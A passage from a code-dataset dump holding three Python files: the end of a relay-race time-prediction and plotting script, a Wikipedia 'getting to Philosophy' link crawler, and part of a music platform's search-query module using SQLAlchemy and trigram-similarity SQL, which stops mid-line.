np.repeat(runner,2) # uncomment for double legs\nrunner = np.tile(runner,int(legs['miles'].size)//runner.size) # everybody runs the same number\n\nrunner = np.insert(runner, 0, 0) # get a slot for the time\n#print('runner', runner, runner.size)\n\n# add the zeroth leg to give start time\nlegs = legs.append({\"number\":0, \"miles\":0.0, \"rating\":0, \"gain\":0, \"loss\":0},\n ignore_index=True)\nlegs['number'] = legs['number'].astype(int)\nlegs = legs.sort_values(by='number')\n# legs = legs.set_index('number') # must be a better way\n#print(legs)\n\n# accumulate a list of distances\nrace = pd.DataFrame({'leg':legs['number'],\n 'distance':legs['miles'],\n 'runner': runner,\n })\nrace['distance_accum'] = np.add.accumulate(race['distance'])\nrace = race.set_index('leg') # must be a better way\n#print(race)\n# debug matplotlib plot\n#fig, axes = plt.subplots()\n#axes.plot(np.arange(legs_full.size)+1, np.add.accumulate(legs_full), label='full')\n#axes.plot(np.arange(legs_ultra.size)+1, np.add.accumulate(legs_ultra), label='ultra')\n#axes.legend()\n\n############################## GOOD UP TO THIS POINT\n\n# setup times for runners\nrunners = pd.DataFrame({'runner':np.arange(10),\n 'name':['NA', 'Mike', 'Ryan', 'Peter', 'Dan', 'Pete',\n 'Gerland', 'Kevin', 'Carlo', 'David'],\n 'pace':[np.timedelta64(int(0), 's'),\n np.timedelta64(int(8.5*60), 's'),\n np.timedelta64(int(8.5*60), 's'),\n np.timedelta64(int(8.5*60), 's'),\n np.timedelta64(int(8.5*60), 's'),\n np.timedelta64(int(8.5*60), 's'),\n np.timedelta64(int(8.5*60), 's'),\n np.timedelta64(int(8.5*60), 's'),\n np.timedelta64(int(8.5*60), 's'),\n np.timedelta64(int(8.5*60), 's')]})\nrunners = runners.set_index('runner') # must be a better way\n#print(runners)\n\n# sunrise/sunset taken from https://www.timeanddate.com/sun/usa/atlanta\nwith 
open(os.path.join(docsdir, 'annotations.json'), 'r') as handle:\n config = json.load(handle)\n for item in config['annotations']:\n key = list(item.keys())[0]\n item[key] = np.datetime64(item[key])\n\n# calculate the leg times for the actual races\ntime_error = np.timedelta64(int(30), 's')\ntime_zero = np.timedelta64(int(0), 's')\nleg_time = []\nleg_time_fast = []\nleg_time_slow = []\nfor index, row in race.iterrows():\n if row.runner == 0:\n leg_time.append(time_zero)\n leg_time_fast.append(time_zero)\n leg_time_slow.append(time_zero)\n else:\n leg_time.append(row.distance*runners.loc[row.runner].pace)\n leg_time_fast.append(row.distance*(runners.loc[row.runner].pace-time_error))\n leg_time_slow.append(row.distance*(runners.loc[row.runner].pace+time_error))\nrace['time'] = leg_time\nrace['time_fast'] = leg_time_fast\nrace['time_slow'] = leg_time_slow\nrace['time_accum'] = np.add.accumulate(race['time'])\nrace['time_accum_fast'] = np.add.accumulate(race['time_fast'])\nrace['time_accum_slow'] = np.add.accumulate(race['time_slow'])\n#print(race)\n\n# set a start time and calculate when the magic happens\ntime_start = np.datetime64('2017-09-08T08:30')\nfor label in ['time_accum', 'time_accum_fast', 'time_accum_slow']:\n race[label] = [ time_start+time_accum for time_accum in race[label]]\n#print(race)\n\n# load in the actual times\nwith open(os.path.join(docsdir,'actual.json'), 'r') as handle:\n actual = json.load(handle)\n actual = [np.datetime64(item) for item in actual]\nwhile len(actual) < legs['miles'].size: # pad out with None for the rest\n actual.append(None)\nlegs = legs.set_index('number') # must be a better way\n#print(legs)\n\n# calculate new updated estimated times\nest_updating = actual[:]\nfor i, _ in enumerate(est_updating):\n if i == 0:\n continue\n if est_updating[i] is not None:\n continue\n est_updating[i] = est_updating[i-1] + race.time[i]\n# add the finish time\nest_updating.append(est_updating[-1] + race.time[race.time.size-1])\n#print(race)\n\n######################################################################\n############################## put together the json document\n#leg_descr = {0:'gre/yel',\n# 1:'red/gre',\n# 2:'yel/red'}\n#leg_miles = {0:legs[0]+legs[1],\n# 1:legs[2]+legs[0],\n# 2:legs[1]+legs[2]}\njson_data = []\nfor index, row in race.iterrows():\n #print(index, row)\n #if index%2 != 0: # it is an ultra\n # continue\n if index == 0:\n continue\n\n runner = ''\n if row.runner != 0:\n runner = runners.loc[row.runner]['name']\n\n #leg_type = int(row.leg/2-1)%3\n\n start = race.iloc[index-1]['time_accum']\n real = actual[index-1]\n if real is None:\n real = ''\n else:\n real = real.astype(datetime)\n if real is None:\n real = ''\n else:\n diff = deltaTimeToStr(start - real)\n real = '%s (%s)' % (real.strftime('%H:%M'), diff)\n start = race.iloc[index-1]['time_accum'].strftime('%H:%M')\n\n time = str(row['time']).split(' ')[-1]\n time = 'h'.join(time.split(':')[:2]) + 'm'\n\n json_data.append({'leg':int(index), \n 'runner':runner,\n 'descr':RATINGS[legs.iloc[index]['rating']],\n 'miles':legs.iloc[index]['miles'],#leg_miles[leg_type],\n 'start':start,\n 'elapse':time, # TODO something wrong here!!!!!!\n 'actual':real})\n\n# add the finish time\nrow = race.iloc[race.distance_accum.size-1]\nstart = row['time_accum']\nreal = actual[-1]\nif real is None:\n real = ''\nelse:\n diff = deltaTimeToStr(start - real)\n real = '%s (%s)' % (real.astype(datetime).strftime('%H:%M'), diff)\nstart = 
row['time_accum'].strftime('%H:%M')\n\njson_data.append({'leg':int(race.distance_accum.size),\n 'runner':'',\n 'descr':'finish',\n 'miles':'',\n 'start':start, # todo\n 'elapse':'',\n 'actual':real}) # todo\n\n# write out the json doc\n#print(json.dumps(json_data, indent=2))\nwith open(os.path.join(docsdir, 'data.json'), 'w') as handle:\n json.dump(json_data, handle, sort_keys=True)\n\n######################################################################\n############################## generate the plotly plot\nplotly_args = {'filename': os.path.join(docsdir, 'plot.html'),\n 'auto_open':False,\n #'output_type': 'div',\n #'include_plotlyjs': False\n }\n\n# define various useful colors\ncolor = dict(cone='#aaaaaa',\n predicted='#555555',\n actual='#7777ff',\n easy='#bbfb9d',\n medium='#fbf59b',\n hard='#fbae9d')\n\n# bounding box\ndistance_bounds = [race.distance_accum[0], race.distance_accum[race.distance_accum.size-1]]\ntime_bounds = [race.time_accum_slow[0], race.time_accum_slow[race.distance_accum.size-1]]\n\n# race distance array\ndistance = race['distance_accum']\n\ndef genDiffValues(distance, tileArray, firstArray):\n y = np.array(tileArray)\n num_tile = int(distance.size/y.size)\n if firstArray is not None:\n num_tile += 1\n y = np.tile(y, num_tile)\n if firstArray is not None:\n y[:len(firstArray)]\n return y\n\ndef difficulties(distance, color, tileArray, firstArray=None):\n y = genDiffValues(distance, tileArray, firstArray)\n\n return go.Scatter(x=distance,\n y=y,\n line=dict(shape='spline', color=color, width=20),\n mode='lines',\n hoverinfo='skip',\n showlegend=False)\n\n\ndata = []\n\n# color bar for difficulties of doubles\n'''\nsingles_pos = race.time_accum[0]\ndoubles_pos = race.time_accum[race.distance_accum.size-1]\n\nfor position, x in zip([singles_pos, doubles_pos], [distance, race['distance_accum']]):\n data.append(difficulties(x, color['easy'],\n [position, position, None]))\n data.append(difficulties(x, color['medium'],\n [None, position, position]))\n data.append(difficulties(x, color['hard'],\n [position, None, position],\n [None, None, position]))\n'''\n\n# prediction cone\nfast = go.Scatter(x=distance,\n y=race['time_accum_fast'],\n name='fast',\n line=dict(shape='spline', color='transparent'),\n mode='lines',\n showlegend=False,\n hoverinfo='skip',\n fill='tonextx',\n fillcolor=color['cone'])\n\nslow = go.Scatter(x=distance,\n y=race['time_accum_slow'],\n name='slow',\n line=dict(shape='spline', color='transparent'),\n mode='lines',\n hoverinfo='skip',\n showlegend=False)\n\n# predicted line\npred_text = []\nactual_text = []\n# leg is the index\nfor x, y, leg, runner, act, est in \\\n zip(distance, race['time_accum'], race.index.tolist(), race['runner'], actual, est_updating):\n #leg_type = leg%3\n #leg = int((leg+1)/2)+1\n runner = runners.iloc[runner]['name']\n\n diff = deltaTimeToStr(y-est)\n\n text = ''\n if act is not None:\n actual_text.append(diff)\n else:\n text = str(est).split(' ')[-1]\n text = ':'.join(text.split(':')[:2])\n text += ' (%s)
    ' % diff\n text += 'leg %d - %.1f miles' % (leg, legs.iloc[leg]['miles'])\n text += '
    %s - %s' % (runner, RATINGS[legs.iloc[leg]['rating']])\n\n pred_text.append(text)\npred_text.append('finish')\nprediction = go.Scatter(x=distance,\n y=race['time_accum'],\n text=pred_text,\n name='prediction',\n line=dict(shape='spline', color=color['predicted'], width=2),\n mode='lines',\n showlegend=False)\n\n# get rid of unstated actual times\nactual = [item for item in actual\n if item is not None]\n\nest_updating = go.Scatter(x=distance[len(actual)-1:],\n y=est_updating[len(actual)-1:],\n name='estimated',\n line=dict(shape='spline', color=color['actual'], width=2, dash='dash'),\n mode='lines',\n hoverinfo='skip',\n showlegend=False)\n\n# actual times\nactual = go.Scatter(x=distance[:len(actual)],\n y=actual,\n text=actual_text,\n name='actual',\n line=dict(shape='spline', color=color['actual'], width=2),\n mode='lines',\n #hoverinfo='skip',\n showlegend=False)\n\n\n# add some annotations\nannotation_symbols = dict(sunrise='\\u263C sunrise',\n sunset='\\u263D sunset')\nannotations = []\nfor item in config['annotations']:\n key = list(item.keys())[0]\n label = annotation_symbols.get(key, key)\n if item[key] > time_bounds[0] and item[key] < time_bounds[-1]:\n annotations.append(dict(x=0, y=item[key], text=label, showarrow=False, xanchor='left'))\n\n# put together the final plot\nlayout = go.Layout(xaxis={'title': 'miles',\n 'showgrid':False,'showline':False},\n yaxis={'showgrid':False,'showline':False,\n 'zeroline':False},\n margin={'r':0,'t':0},\n annotations=annotations\n)\ndata.extend([slow,fast,prediction,est_updating, actual])\nfig = go.Figure(data=data,\n layout=layout)\nplot(fig, show_link=False, **plotly_args)\n","sub_path":"python/BlueRidgeRelay2017.py","file_name":"BlueRidgeRelay2017.py","file_ext":"py","file_size_in_byte":13912,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"356231643","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Jun 18 13:22:40 2019\n\n@author: rehab\n\"\"\"\n\nimport requests\nfrom bs4 import BeautifulSoup\nimport time \nimport urllib\n\ncount=0\nstart_url=\"https://en.wikipedia.org/wiki/Special:Random \"\n\n\ndef get_first_link(url):\n global count\n _page=requests.get(url)\n soup = BeautifulSoup(_page.content, 'html.parser')\n content=soup.find(id=\"mw-content-text\").find(class_=\"mw-parser-output\")\n #print(content)\n \n link=None\n for element in content.find_all(\"p\",recursive=False):\n if element.find(\"a\",recursive=False):\n link=element.find(\"a\",recursive=False).get('href')\n break\n count+=1 \n \n return link\n \n\nlinks=[]\ndef getting_Philosophy(start_url):\n first_link=get_first_link(start_url)\n \n #time.sleep(.5)\n if first_link ==None:\n print(\"there is no wiki links\")\n elif count >50:\n print(\"stuck in a loop , search aborted\")\n \n else:\n link=urllib.parse.urljoin(\"https://en.wikipedia.org\", first_link)\n links.append(link)\n print(link)\n time.sleep(.5)\n page=requests.get(link)\n soup = BeautifulSoup(page.content, 'html.parser')\n if links[-1] in links[:-1]:\n print(\"Arrived at an article already seen\")\n \n \n elif soup.find(id=\"firstHeading\").text == \"Philosophy\" :\n print(\"Philosophy page is reached\")\n \n else:\n getting_Philosophy(link)\n \n \ngetting_Philosophy(start_url) \n\n\n\n\n \n ","sub_path":"getting_Philosophy.py","file_name":"getting_Philosophy.py","file_ext":"py","file_size_in_byte":1565,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"68495861","text":"from enum import 
Enum\nimport concurrent.futures\nimport logging # pylint: disable=C0302\nfrom functools import cmp_to_key\nfrom flask import Blueprint, request\nimport sqlalchemy\n\nfrom src import api_helpers, exceptions\nfrom src.queries.search_config import (\n search_title_weight,\n user_name_weight,\n search_similarity_weight,\n search_repost_weight,\n user_follower_weight,\n search_user_name_weight,\n search_title_exact_match_boost,\n search_handle_exact_match_boost,\n search_user_name_exact_match_boost,\n user_handle_exact_match_boost,\n)\nfrom src.models import Track, RepostType, Save, SaveType, Follow\nfrom src.utils import helpers\nfrom src.utils.db_session import get_db_read_replica\nfrom src.queries import response_name_constants\nfrom src.queries.get_unpopulated_users import get_unpopulated_users\nfrom src.queries.get_unpopulated_tracks import get_unpopulated_tracks\nfrom src.queries.get_unpopulated_playlists import get_unpopulated_playlists\nfrom src.queries.search_track_tags import search_track_tags\nfrom src.queries.search_user_tags import search_user_tags\nfrom src.queries.query_helpers import (\n get_current_user_id,\n get_users_by_id,\n get_users_ids,\n populate_user_metadata,\n populate_track_metadata,\n populate_playlist_metadata,\n get_pagination_vars,\n)\n\nlogger = logging.getLogger(__name__)\nbp = Blueprint(\"search_tags\", __name__)\n\n\n######## VARS ########\n\n\nclass SearchKind(Enum):\n all = 1\n tracks = 2\n users = 3\n playlists = 4\n albums = 5\n\n\n######## UTILS ########\n\n\ndef compare_users(user1, user2):\n \"\"\"Comparison util for ordering user search results.\"\"\"\n # Any verified user is ranked higher\n if user1[\"is_verified\"] and not user2[\"is_verified\"]:\n return -1\n if user2[\"is_verified\"] and not user1[\"is_verified\"]:\n return 1\n return 0\n\n\n######## ROUTES ########\n\n\n@bp.route(\"/search/tags\", methods=(\"GET\",))\ndef search_tags():\n search_str = request.args.get(\"query\", type=str)\n current_user_id = get_current_user_id(required=False)\n if not search_str:\n raise exceptions.ArgumentError(\"Invalid value for parameter 'query'\")\n\n user_tag_count = request.args.get(\"user_tag_count\", type=str)\n if not user_tag_count:\n user_tag_count = \"2\"\n\n kind = request.args.get(\"kind\", type=str, default=\"all\")\n validSearchKinds = [SearchKind.all, SearchKind.tracks, SearchKind.users]\n try:\n searchKind = SearchKind[kind]\n if searchKind not in validSearchKinds:\n raise Exception\n except Exception:\n return api_helpers.error_response(\n \"Invalid value for parameter 'kind' must be in %s\"\n % [k.name for k in validSearchKinds],\n 400,\n )\n\n results = {}\n\n (limit, offset) = get_pagination_vars()\n db = get_db_read_replica()\n with db.scoped_session() as session:\n if searchKind in [SearchKind.all, SearchKind.tracks]:\n results[\"tracks\"] = search_track_tags(\n session,\n {\n \"search_str\": search_str,\n \"current_user_id\": current_user_id,\n \"limit\": limit,\n \"offset\": offset,\n },\n )\n\n if searchKind in [SearchKind.all, SearchKind.users]:\n results[\"users\"] = search_user_tags(\n session,\n {\n \"search_str\": search_str,\n \"current_user_id\": current_user_id,\n \"user_tag_count\": user_tag_count,\n \"limit\": limit,\n \"offset\": offset,\n },\n )\n\n # Add personalized results for a given user\n if current_user_id:\n if searchKind in [SearchKind.all, SearchKind.tracks]:\n # Query saved tracks for the current user that contain this tag\n track_ids = [track[\"track_id\"] for track in results[\"tracks\"]]\n track_play_counts = 
{\n track[\"track_id\"]: track[response_name_constants.play_count]\n for track in results[\"tracks\"]\n }\n\n saves_query = (\n session.query(Save.save_item_id)\n .filter(\n Save.is_current == True,\n Save.is_delete == False,\n Save.save_type == SaveType.track,\n Save.user_id == current_user_id,\n Save.save_item_id.in_(track_ids),\n )\n .all()\n )\n saved_track_ids = [i[0] for i in saves_query]\n saved_tracks = (\n session.query(Track)\n .filter(\n Track.is_current == True,\n Track.is_delete == False,\n Track.is_unlisted == False,\n Track.stem_of == None,\n Track.track_id.in_(saved_track_ids),\n )\n .all()\n )\n saved_tracks = helpers.query_result_to_list(saved_tracks)\n for saved_track in saved_tracks:\n saved_track_id = saved_track[\"track_id\"]\n saved_track[response_name_constants.play_count] = track_play_counts.get(\n saved_track_id, 0\n )\n saved_tracks = populate_track_metadata(\n session, saved_track_ids, saved_tracks, current_user_id\n )\n\n # Sort and paginate\n play_count_sorted_saved_tracks = sorted(\n saved_tracks,\n key=lambda i: i[response_name_constants.play_count],\n reverse=True,\n )\n\n play_count_sorted_saved_tracks = play_count_sorted_saved_tracks[\n slice(offset, offset + limit, 1)\n ]\n\n results[\"saved_tracks\"] = play_count_sorted_saved_tracks\n\n if searchKind in [SearchKind.all, SearchKind.users]:\n # Query followed users that have referenced this tag\n user_ids = [user[\"user_id\"] for user in results[\"users\"]]\n followed_user_query = (\n session.query(Follow.followee_user_id)\n .filter(\n Follow.is_current == True,\n Follow.is_delete == False,\n Follow.follower_user_id == current_user_id,\n Follow.followee_user_id.in_(user_ids),\n )\n .all()\n )\n followed_user_ids = [i[0] for i in followed_user_query]\n followed_users = get_unpopulated_users(session, followed_user_ids)\n followed_users = populate_user_metadata(\n session, followed_user_ids, followed_users, current_user_id\n )\n\n followed_users_followee_sorted = sorted(\n followed_users,\n key=lambda i: i[response_name_constants.follower_count],\n reverse=True,\n )\n\n followed_users_followee_sorted = followed_users_followee_sorted[\n slice(offset, offset + limit, 1)\n ]\n\n results[\"followed_users\"] = followed_users_followee_sorted\n\n return api_helpers.success_response(results)\n\n\ndef add_users(session, results):\n user_id_list = get_users_ids(results)\n users = get_users_by_id(session, user_id_list)\n for result in results:\n user_id = None\n if \"playlist_owner_id\" in result:\n user_id = result[\"playlist_owner_id\"]\n elif \"owner_id\" in result:\n user_id = result[\"owner_id\"]\n\n if user_id is not None:\n user = users[user_id]\n result[\"user\"] = user\n return results\n\n\ndef perform_search_query(db, search_type, args):\n \"\"\"Performs a search query of a given `search_type`. Handles it's own session. 
Used concurrently.\"\"\"\n with db.scoped_session() as session:\n search_str = args.get(\"search_str\")\n limit = args.get(\"limit\")\n offset = args.get(\"offset\")\n is_auto_complete = args.get(\"is_auto_complete\")\n current_user_id = args.get(\"current_user_id\")\n only_downloadable = args.get(\"only_downloadable\")\n\n results = None\n if search_type == \"tracks\":\n results = track_search_query(\n session,\n search_str,\n limit,\n offset,\n False,\n is_auto_complete,\n current_user_id,\n only_downloadable,\n )\n elif search_type == \"saved_tracks\":\n results = track_search_query(\n session,\n search_str,\n limit,\n offset,\n True,\n is_auto_complete,\n current_user_id,\n only_downloadable,\n )\n elif search_type == \"users\":\n results = user_search_query(\n session,\n search_str,\n limit,\n offset,\n False,\n is_auto_complete,\n current_user_id,\n )\n elif search_type == \"followed_users\":\n results = user_search_query(\n session,\n search_str,\n limit,\n offset,\n True,\n is_auto_complete,\n current_user_id,\n )\n elif search_type == \"playlists\":\n results = playlist_search_query(\n session,\n search_str,\n limit,\n offset,\n False,\n False,\n is_auto_complete,\n current_user_id,\n )\n elif search_type == \"saved_playlists\":\n results = playlist_search_query(\n session,\n search_str,\n limit,\n offset,\n False,\n True,\n is_auto_complete,\n current_user_id,\n )\n elif search_type == \"albums\":\n results = playlist_search_query(\n session,\n search_str,\n limit,\n offset,\n True,\n False,\n is_auto_complete,\n current_user_id,\n )\n elif search_type == \"saved_albums\":\n results = playlist_search_query(\n session,\n search_str,\n limit,\n offset,\n True,\n True,\n is_auto_complete,\n current_user_id,\n )\n return results\n\n\n# SEARCH QUERIES\n# We chose to use the raw SQL instead of SQLAlchemy because we're pushing SQLAlchemy to it's\n# limit to do this query by creating new wrappers for pg functions that do not exist like\n# TSQuery and pg_trgm specific functions like similarity.\n#\n# However, we query for object_id and fetch the actual objects using SQLAlchemy to preserve\n# the full objects and helper methods that the ORM provides. This is done in post-processing\n# after the initial text query executes.\n#\n# search query against custom materialized view created in alembic migration\n# - returns all object ids which have a trigram match with query string\n# - order by descending similarity and paginate\n# - de-duplicates object_ids with multiple hits, returning highest match\n#\n# queries can be called for public data, or personalized data\n# - personalized data will return only saved tracks, saved playlists, or followed users given current_user_id\n#\n# @devnote - track_ids argument should match tracks argument\n\n\ndef search(args):\n \"\"\"Perform a search. 
`args` should contain `is_auto_complete`,\n `query`, `kind`, `current_user_id`, and `only_downloadable`\n \"\"\"\n search_str = args.get(\"query\")\n\n # when creating query table, we substitute this too\n search_str = search_str.replace(\"&\", \"and\")\n\n kind = args.get(\"kind\", \"all\")\n is_auto_complete = args.get(\"is_auto_complete\")\n current_user_id = args.get(\"current_user_id\")\n only_downloadable = args.get(\"only_downloadable\")\n limit = args.get(\"limit\")\n offset = args.get(\"offset\")\n\n searchKind = SearchKind[kind]\n\n results = {}\n\n # Accumulate user_ids for later\n user_ids = set()\n\n # Create args for perform_search_query\n search_args = {\n \"search_str\": search_str,\n \"limit\": limit,\n \"offset\": offset,\n \"is_auto_complete\": is_auto_complete,\n \"current_user_id\": current_user_id,\n \"only_downloadable\": only_downloadable,\n }\n\n if search_str:\n db = get_db_read_replica()\n # Concurrency approach:\n # Spin up a ThreadPoolExecutor for each request to perform_search_query\n # to perform the different search types in parallel.\n # After each future resolves, we then add users for each entity in a single\n # db round trip.\n with concurrent.futures.ThreadPoolExecutor(max_workers=8) as executor:\n # Keep a mapping of future -> search_type\n futures_map = {}\n futures = []\n\n # Helper fn to submit a future and add it to bookkeeping data structures\n def submit_and_add(search_type):\n future = executor.submit(\n perform_search_query, db, search_type, search_args\n )\n futures.append(future)\n futures_map[future] = search_type\n\n if searchKind in [SearchKind.all, SearchKind.tracks]:\n submit_and_add(\"tracks\")\n if current_user_id:\n submit_and_add(\"saved_tracks\")\n\n if searchKind in [SearchKind.all, SearchKind.users]:\n submit_and_add(\"users\")\n if current_user_id:\n submit_and_add(\"followed_users\")\n\n if searchKind in [SearchKind.all, SearchKind.playlists]:\n submit_and_add(\"playlists\")\n if current_user_id:\n submit_and_add(\"saved_playlists\")\n\n if searchKind in [SearchKind.all, SearchKind.albums]:\n submit_and_add(\"albums\")\n if current_user_id:\n submit_and_add(\"saved_albums\")\n\n for future in concurrent.futures.as_completed(futures):\n search_result = future.result()\n future_type = futures_map[future]\n\n # Add to the final results\n results[future_type] = search_result\n\n # Add to user_ids\n user_ids.update(get_users_ids(search_result))\n\n with db.scoped_session() as session:\n # Add users back\n users = get_users_by_id(session, list(user_ids), current_user_id)\n\n for (_, result_list) in results.items():\n for result in result_list:\n user_id = None\n if \"playlist_owner_id\" in result:\n user_id = result[\"playlist_owner_id\"]\n elif \"owner_id\" in result:\n user_id = result[\"owner_id\"]\n\n if user_id is not None:\n user = users[user_id]\n result[\"user\"] = user\n return results\n\n\ndef track_search_query(\n session,\n search_str,\n limit,\n offset,\n personalized,\n is_auto_complete,\n current_user_id,\n only_downloadable,\n):\n if personalized and not current_user_id:\n return []\n\n res = sqlalchemy.text(\n # pylint: disable=C0301\n f\"\"\"\n select track_id, b.balance, b.associated_wallets_balance from (\n select distinct on (owner_id) track_id, owner_id, total_score from (\n select track_id, owner_id,\n (\n (:similarity_weight * sum(score)) +\n (:title_weight * similarity(coalesce(title, ''), query)) +\n (:user_name_weight * similarity(coalesce(user_name, ''), query)) +\n (:repost_weight * log(case when 
(repost_count = 0) then 1 else repost_count end)) +\n (case when (lower(query) = coalesce(title, '')) then :title_match_boost else 0 end) +\n (case when (lower(query) = handle) then :handle_match_boost else 0 end) +\n (case when (lower(query) = user_name) then :user_name_match_boost else 0 end)\n ) as total_score\n from (\n select\n d.\"track_id\" as track_id, d.\"word\" as word, similarity(d.\"word\", :query) as score,\n d.\"track_title\" as title, :query as query, d.\"user_name\" as user_name, d.\"handle\" as handle,\n d.\"repost_count\" as repost_count, d.\"owner_id\" as owner_id\n from \"track_lexeme_dict\" d\n {\n 'inner join \"saves\" s on s.save_item_id = d.track_id'\n if personalized and current_user_id\n else \"\"\n }\n {\n 'inner join \"tracks\" t on t.track_id = d.track_id'\n if only_downloadable\n else \"\"\n }\n where (d.\"word\" % lower(:query) or d.\"handle\" = lower(:query) or d.\"user_name\" % lower(:query))\n {\n \"and s.save_type='track' and s.is_current=true and \" +\n \"s.is_delete=false and s.user_id = :current_user_id\"\n if personalized and current_user_id\n else \"\"\n }\n {\n \"and (t.download->>'is_downloadable')::boolean is True\"\n if only_downloadable\n else \"\"\n }\n ) as results\n group by track_id, title, query, user_name, handle, repost_count, owner_id\n ) as results2\n order by owner_id, total_score desc\n ) as u left join user_balances b on u.owner_id = b.user_id\n order by total_score desc\n limit :limit\n offset :offset;\n \"\"\"\n )\n\n track_data = session.execute(\n res,\n {\n \"query\": search_str,\n \"limit\": limit,\n \"offset\": offset,\n \"title_weight\": search_title_weight,\n \"repost_weight\": search_repost_weight,\n \"similarity_weight\": search_similarity_weight,\n \"current_user_id\": current_user_id,\n \"user_name_weight\": search_user_name_weight,\n \"title_match_boost\": search_title_exact_match_boost,\n \"handle_match_boost\": search_handle_exact_match_boost,\n \"user_name_match_boost\": search_user_name_exact_match_boost,\n },\n ).fetchall()\n\n # track_ids is list of tuples - simplify to 1-D list\n track_ids = [i[0] for i in track_data]\n tracks = get_unpopulated_tracks(session, track_ids, True)\n\n # TODO: Populate track metadata should be sped up to be able to be\n # used in search autocomplete as that'll give us better results.\n if is_auto_complete:\n # fetch users for tracks\n track_owner_ids = list(map(lambda track: track[\"owner_id\"], tracks))\n users = get_unpopulated_users(session, track_owner_ids)\n users_dict = {user[\"user_id\"]: user for user in users}\n\n # attach user objects to track objects\n for i, track in enumerate(tracks):\n user = users_dict[track[\"owner_id\"]]\n # Add user balance\n balance = track_data[i][1]\n associated_balance = track_data[i][2]\n user[response_name_constants.balance] = balance\n user[\n response_name_constants.associated_wallets_balance\n ] = associated_balance\n track[\"user\"] = user\n else:\n # bundle peripheral info into track results\n tracks = populate_track_metadata(session, track_ids, tracks, current_user_id)\n\n # Preserve order from track_ids above\n tracks_map = {}\n for t in tracks:\n tracks_map[t[\"track_id\"]] = t\n tracks = [tracks_map[track_id] for track_id in track_ids]\n\n return tracks[0:limit]\n\n\ndef user_search_query(\n session, search_str, limit, offset, personalized, is_auto_complete, current_user_id\n):\n if personalized and not current_user_id:\n return []\n\n res = sqlalchemy.text(\n \"\"\"\n select u.user_id, b.balance, b.associated_wallets_balance from (\n 
select user_id from (\n select user_id, (\n sum(score) +\n (:follower_weight * log(case when (follower_count = 0) then 1 else follower_count end)) +\n (case when (handle=query) then :handle_match_boost else 0 end) +\n (:name_weight * similarity(coalesce(name, ''), query))) as total_score from (\n select\n d.\"user_id\" as user_id,\n d.\"word\" as word,\n d.\"handle\" as handle,\n similarity(d.\"word\", :query) as score,\n d.\"user_name\" as name,\n :query as query,\n d.\"follower_count\" as follower_count\n from \"user_lexeme_dict\" d\n where\n d.\"word\" % :query OR\n d.\"handle\" = :query\n ) as results\n group by user_id, name, query, handle, follower_count\n ) as results2\n order by total_score desc, user_id asc\n limit :limit\n offset :offset\n ) as u left join user_balances b on u.user_id = b.user_id\n \"\"\"\n )\n\n user_info = session.execute(\n res,\n {\n \"query\": search_str,\n \"limit\": limit,\n \"offset\": offset,\n \"name_weight\": user_name_weight,\n \"follower_weight\": user_follower_weight,\n \"current_user_id\": current_user_id,\n \"handle_match_boost\": user_handle_exact_match_boost,\n },\n ).fetchall()\n\n # user_ids is list of tuples - simplify to 1-D list\n user_ids = [i[0] for i in user_info]\n\n users = get_unpopulated_users(session, user_ids)\n\n if is_auto_complete:\n for i, user in enumerate(users):\n balance = user_info[i][1]\n associated_wallets_balance = user_info[i][2]\n user[response_name_constants.balance] = balance\n user[\n response_name_constants.associated_wallets_balance\n ] = associated_wallets_balance\n else:\n # bundle peripheral info into user results\n users = populate_user_metadata(session, user_ids, users, current_user_id)\n\n # Preserve order from user_ids above\n user_map = {}\n for u in users:\n user_map[u[\"user_id\"]] = u\n users = [user_map[user_id] for user_id in user_ids]\n\n # Sort users by extra criteria for \"best match\"\n users.sort(key=cmp_to_key(compare_users))\n\n return users[0:limit]\n\n\ndef playlist_search_query(\n session,\n search_str,\n limit,\n offset,\n is_album,\n personalized,\n is_auto_complete,\n current_user_id,\n):\n if personalized and not current_user_id:\n return []\n\n table_name = \"album_lexeme_dict\" if is_album else \"playlist_lexeme_dict\"\n repost_type = RepostType.album if is_album else RepostType.playlist\n save_type = SaveType.album if is_album else SaveType.playlist\n\n # SQLAlchemy doesn't expose a way to escape a string with double-quotes instead of\n # single-quotes, so we have to use traditional string substitution. 
This is safe\n # because the value is not user-specified.\n res = sqlalchemy.text(\n # pylint: disable=C0301\n f\"\"\"\n select p.playlist_id, b.balance, b.associated_wallets_balance from (\n select distinct on (owner_id) playlist_id, owner_id, total_score from (\n select playlist_id, owner_id, (\n (:similarity_weight * sum(score)) +\n (:title_weight * similarity(coalesce(playlist_name, ''), query)) +\n (:user_name_weight * similarity(coalesce(user_name, ''), query)) +\n (:repost_weight * log(case when (repost_count = 0) then 1 else repost_count end)) +\n (case when (lower(query) = coalesce(playlist_name, '')) then :title_match_boost else 0 end) +\n (case when (lower(query) = handle) then :handle_match_boost else 0 end) +\n (case when (lower(query) = user_name) then :user_name_match_boost else 0 end)\n ) as total_score\n from (\n select\n d.\"playlist_id\" as playlist_id, d.\"word\" as word, similarity(d.\"word\", :query) as score,\n d.\"playlist_name\" as playlist_name, :query as query, d.\"repost_count\" as repost_count,\n d.\"handle\" as handle, d.\"user_name\" as user_name, d.\"owner_id\" as owner_id\n from \"{table_name}\" d\n {\n 'inner join \"saves\" s on s.save_item_id = d.playlist_id'\n if personalized and current_user_id\n else \"\"\n }\n where (d.\"word\" % lower(:query) or d.\"handle\" = lower(:query) or d.\"user_name\" % lower(:query))\n {\n \"and s.save_type='\" + save_type +\n \"' and s.is_current=true and s.is_delete=false and s.user_id=:current_user_id\"\n if personalized and current_user_id\n else \"\"\n }\n ) as results\n group by playlist_id, playlist_name, query, repost_count, user_name, handle, owner_id\n ) as results2\n order by owner_id, total_score desc\n ) as p left join user_balances b on p.owner_id = b.user_id\n order by total_score desc\n limit :limit\n offset :offset;\n \"\"\"\n )\n\n playlist_data = session.execute(\n res,\n {\n \"query\": search_str,\n \"limit\": limit,\n \"offset\": offset,\n \"title_weight\": search_title_weight,\n \"repost_weight\": search_repost_weight,\n \"similarity_weight\": search_similarity_weight,\n \"current_user_id\": current_user_id,\n \"user_name_weight\": search_user_name_weight,\n \"title_match_boost\": search_title_exact_match_boost,\n \"handle_match_boost\": search_handle_exact_match_boost,\n \"user_name_match_boost\": search_user_name_exact_match_boost,\n },\n ).fetchall()\n\n # playlist_ids is list of tuples - simplify to 1-D list\n playlist_ids = [i[0] for i in playlist_data]\n playlists = 